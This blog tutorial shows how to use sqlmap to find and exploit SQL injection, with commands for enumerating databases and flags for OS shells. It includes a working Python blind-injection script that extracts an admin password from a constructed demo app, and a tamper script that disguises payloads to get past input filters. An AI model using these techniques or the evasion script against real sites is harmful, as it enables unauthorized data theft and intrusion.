Friday, December 14, 2018

SQL Injection with sqlmap

sqlmap is an open source tool written in Python that automates the detection and exploitation of SQL injection flaws. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM Db2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB, and Informix databases. In this tutorial, I will cover how to use sqlmap to test for and exploit SQL injection.

How To Use sqlmap

1. First, take a look at the sqlmap help menu to get an overview of the features it offers. This can be done using the following command.

sqlmap -h 


2. To test a URL for SQL injection, pass it with the -u flag. sqlmap tests every parameter in the query string (here "something") with its injection payloads:

sqlmap -u "http://website.com/something.php?something=1"

3. Once sqlmap has identified the back-end DBMS, it asks whether to skip the test payloads that are specific to other DBMSes. Answering yes (y) saves time, because only payloads for the detected database are then tried.


4. Once an injection has been confirmed, we can enumerate the database names with the --dbs flag, as in the command below.

sqlmap -u "http://website.com/something.php?something=1" --dbs


5. Now that we know the databases, we can enumerate table and column names with the --tables and --columns flags (note the plural: --column is not a valid option). Without -D (database) and -T (table) to narrow the scope, sqlmap enumerates every table and column it can reach, which can take a long time.

sqlmap -u "http://website.com/something.php?something=1" --tables --columns


6. To check whether the database user the application connects with has administrator (DBA) privileges, we can use the --is-dba flag. This matters because features such as file access and command execution only work with a privileged user.

sqlmap -u "http://website.com/something.php?something=1" --is-dba

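The following is an added example, not code from the original post or from sqlmap itself, showing what steps 2 to 6 above automate: detecting a boolean-based blind injection, fingerprinting the DBMS (the reason behind the "skip other DBMSes" prompt), and enumerating tables and columns one character at a time. It goes one step beyond the post by also pulling a single value out of a table, as --dump would. The vulnerable "application" is a constructed in-memory SQLite app whose query parameter stands in for something.php?something=1; the table, column and row contents are all assumptions of this example.

```python
import sqlite3
import string

# ---- Constructed target (assumption of this example, not from the post) ----
# Stand-in for "something.php?something=1": the parameter is concatenated
# straight into the query, which is exactly the flaw sqlmap hunts for.
class VulnerableApp:
    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
            CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
            INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
            INSERT INTO users VALUES (1, 'admin', 's3cret');
        """)

    def page(self, something):
        """Return the page body the 'web server' would send back."""
        sql = "SELECT name FROM products WHERE id = " + something  # vulnerable
        try:
            rows = self.db.execute(sql).fetchall()
        except sqlite3.Error:
            return "Database error"
        return ("Product: " + rows[0][0]) if rows else "No product found"

# ---- Attacker side: what sqlmap -u ... --dbs/--tables/--columns automates ----
CHARSET = string.ascii_letters + string.digits + "_"

def detect_boolean_injection(app, base="1"):
    """Step 2: a parameter is injectable if a TRUE condition leaves the page
    unchanged while a FALSE condition changes it (boolean-based blind)."""
    baseline = app.page(base)
    return (app.page(base + " AND 1=1") == baseline
            and app.page(base + " AND 1=2") != baseline)

def ask(app, condition):
    """Put one yes/no question to the database through the injected parameter."""
    return app.page("1 AND (" + condition + ")") == app.page("1")

def fingerprint(app):
    """Step 3: probe DBMS-specific syntax so later payloads can be limited
    to the detected back end (what answering 'y' to sqlmap's prompt does)."""
    probes = {"MySQL": "@@version IS NOT NULL",
              "PostgreSQL": "version() IS NOT NULL",
              "SQLite": "sqlite_version() IS NOT NULL"}
    for dbms, probe in probes.items():
        if ask(app, probe):
            return dbms
    return "unknown"

def count(app, expr):
    """Recover a small integer by asking 'is it greater than n?' repeatedly."""
    n = 0
    while ask(app, "(" + expr + ") > " + str(n)):
        n += 1
    return n

def extract(app, expr, maxlen=32):
    """Recover the string value of an SQL expression one character at a time."""
    out = ""
    for pos in range(1, maxlen + 1):
        for ch in CHARSET:
            if ask(app, "substr((%s), %d, 1) = '%s'" % (expr, pos, ch)):
                out += ch
                break
        else:
            break  # no character matched: end of string
    return out

def list_tables(app):
    """Steps 4/5 (--dbs/--tables): SQLite keeps its schema in sqlite_master."""
    q = "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name"
    n = count(app, "SELECT count(*) FROM sqlite_master WHERE type = 'table'")
    return [extract(app, q + " LIMIT 1 OFFSET %d" % i) for i in range(n)]

def list_columns(app, table):
    """Step 5 (--columns): column names via the pragma_table_info() table-valued function."""
    q = "SELECT name FROM pragma_table_info('%s') ORDER BY cid" % table
    n = count(app, "SELECT count(*) FROM pragma_table_info('%s')" % table)
    return [extract(app, q + " LIMIT 1 OFFSET %d" % i) for i in range(n)]

def dump(app, table, column, where="1=1"):
    """Beyond the post's steps: pull a single value (what --dump does row by row)."""
    return extract(app, "SELECT %s FROM %s WHERE %s LIMIT 1" % (column, table, where))

if __name__ == "__main__":
    app = VulnerableApp()
    print("injectable:", detect_boolean_injection(app))
    print("dbms:", fingerprint(app))
    for t in list_tables(app):
        print(t, list_columns(app, t))
    print("admin password:", dump(app, "users", "password", "username = 'admin'"))
```

Every fact is recovered through the same two-page comparison, which is why blind enumeration is slow and why sqlmap offers --threads and --eta; on a real target the page is fetched over HTTP and the baseline comparison has to tolerate dynamic content, which sqlmap handles with its page-similarity ratio.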

7. sqlmap has many more flags. The table below lists some of the most useful ones and what they do.

Flag         Description
--tables     Enumerate the table names of the target database(s); combine with -D to select a database
-T           Specify the table name to operate on (for example with --columns or --dump)
--os-cmd     Execute an operating system command on the database server (needs a privileged database user)
--os-shell   Prompt for an interactive operating system shell on the database server
-r           Load the HTTP request to test from a file, for example one saved from an intercepting proxy
--tamper     Use the given tamper script(s) to modify payloads, typically to get past input filters
--eta        Display the estimated time of arrival for each piece of output
--dbms       Force the back-end DBMS (for example MySQL, MSSQL or Oracle) so that only payloads for that DBMS are used
--proxy      Use a proxy to connect to the target URL
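The --tamper flag in the table above takes a Python script that rewrites every payload before it is sent. As an added example, not one of sqlmap's bundled scripts, here is a small tamper script that alternates the case of SQL keywords and replaces spaces outside string literals with inline comments, which is enough to get past naive filters that match "UNION SELECT" literally. The script name is hypothetical; saved as tamper/altcase_space2comment.py inside the sqlmap tree it would be selected with --tamper=altcase_space2comment. The PRIORITY import only exists when sqlmap loads the script, so it is guarded so the file also runs stand-alone.

```python
import re

try:
    from lib.core.enums import PRIORITY  # present when sqlmap loads the script
    __priority__ = PRIORITY.NORMAL
except ImportError:  # imported stand-alone, outside the sqlmap tree
    __priority__ = 0

# Keywords whose case is alternated; a filter matching only "UNION SELECT"
# in upper case will not see "uNiOn sElEcT". Chosen for this example.
KEYWORDS = ("SELECT", "UNION", "AND", "OR", "FROM", "WHERE", "ORDER", "BY", "NULL")

def dependencies():
    pass  # nothing extra required

def _altcase(word):
    """'SELECT' -> 'sElEcT' (deterministic, so results are reproducible)."""
    return "".join(c.lower() if i % 2 == 0 else c.upper() for i, c in enumerate(word))

def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload; must return the modified payload."""
    if not payload:
        return payload
    pattern = r"\b(" + "|".join(KEYWORDS) + r")\b"
    altered = re.sub(pattern, lambda m: _altcase(m.group(1)), payload, flags=re.IGNORECASE)
    # Replace spaces with inline comments, but leave spaces inside string literals alone,
    # otherwise a payload such as name='a b' would be corrupted.
    out, quote = [], None
    for ch in altered:
        if ch in ("'", '"'):
            quote = None if quote == ch else (quote or ch)
        out.append("/**/" if ch == " " and quote is None else ch)
    return "".join(out)

if __name__ == "__main__":
    print(tamper("1 UNION SELECT username FROM users WHERE name='a b'"))
```

Tamper scripts only change how a payload looks on the wire; whether the target's database actually accepts /**/ as whitespace depends on the DBMS, so test a new script against the DBMS sqlmap has fingerprinted before relying on it.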
